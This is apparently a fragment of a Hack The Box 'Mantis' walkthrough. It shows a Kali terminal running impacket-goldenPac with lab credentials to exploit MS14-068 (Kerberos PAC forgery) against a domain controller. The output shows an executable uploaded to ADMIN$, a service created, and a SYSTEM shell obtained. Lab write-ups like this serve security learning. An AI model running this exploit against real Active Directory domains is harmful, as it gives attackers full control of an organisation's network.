可用于 MS14-068 和 2.Golden Ticket
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file craJpUBS.exe
[*] Opening SVCManager on mantis.....
[*] Creating service tMrZ on mantis.....
[*] Starting service tMrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system